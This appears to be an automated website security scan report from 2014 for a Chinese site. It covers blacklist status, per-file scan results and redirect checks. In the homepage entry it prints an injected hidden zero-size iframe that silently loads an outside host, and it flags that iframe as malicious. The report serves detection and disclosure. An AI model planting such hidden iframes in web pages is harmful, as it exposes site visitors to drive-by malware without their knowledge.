Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zhy.chinawuyuan.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zhy.chinawuyuan.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://zhy.chinawuyuan.com/ | 200 OK Content-Length: 51088 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function objSP_Article() {this.ImgUrl=""; this.LinkUrl=""; this.Title="";} function SlidePic_Article(_id) {this.ID=_id; this.Width=0;this.Height=0; this.TimeOut=5000; this.Effect=23; this.TitleLen=0; this.PicNum=-1; this.Img=null; this.Url=null; this.Title=null; this.AllPic=new Array(); this.Add=SlidePic_Article_Add; this.Show=SlidePic_Article_Show; this.LoopShow=SlidePic_Article_LoopShow;} function SlidePic_Article_Add(_SP) {this.AllPic[this.AllPic.length] = _SP;} < this.Img.filters.revealTrans.Transition=this.Effect; this.Img.filters.revealTrans.apply(); this.Img.src=this.AllPic[this.PicNum].ImgUrl; this.Img.filters.revealTrans.play(); this.Url.href=this.AllPic[this.PicNum].LinkUrl; if(this.Title) this.Title.innerHTML="<a href="+this.AllPic[this.PicNum].LinkUrl+" target=_blank>"+this.AllPic[this.PicNum].Title+"</a>"; this.Img.timer=setTimeout(this.ID+".LoopShow()",this.TimeOut); } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.beeox.com/index1.html <iframe src=http://www.beeox.com/index1.html width=0 height=0> | ||
http://zhy.chinawuyuan.com/Article/JS/Article_newgz01.js | 200 OK Content-Length: 1146 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_newgz03.js | 200 OK Content-Length: 1202 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_newgz02.js | 200 OK Content-Length: 1236 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_Newslymb.js | 200 OK Content-Length: 1307 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Photo/JS/Photo_New0.js | 200 OK Content-Length: 1459 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_New001.js | 200 OK Content-Length: 931 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_New002.js | 200 OK Content-Length: 1002 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_New003.js | 200 OK Content-Length: 722 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_New004.js | 200 OK Content-Length: 991 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_Newzjzy.js | 200 OK Content-Length: 829 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_Newzyxm.js | 200 OK Content-Length: 914 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_New10.js | 200 OK Content-Length: 212 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_Newqhjt.js | 200 OK Content-Length: 665 Content-Type: application/x-javascript | clean |
http://zhy.chinawuyuan.com/Article/JS/Article_Newqw01.js | 200 OK Content-Length: 973 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zhy.chinawuyuan.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 03 Oct 2014 23:33:44 GMT
Server: Microsoft-IIS/6.0
Content-Length: 51088
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQQBQBDB=OGFDOFGDPLNJFNPCCGHKFJCK; path=/
X-Powered-By: ASP.NET
...51088 bytes of data.
GET / HTTP/1.1
Host: zhy.chinawuyuan.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 03 Oct 2014 23:33:44 GMT
Server: Microsoft-IIS/6.0
Content-Length: 51088
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQQBQBDB=OGFDOFGDPLNJFNPCCGHKFJCK; path=/
X-Powered-By: ASP.NET
...51088 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: zhy.chinawuyuan.com
Referer: http://www.google.com/search?q=zhy.chinawuyuan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zhy.chinawuyuan.com
Referer: http://www.google.com/search?q=zhy.chinawuyuan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.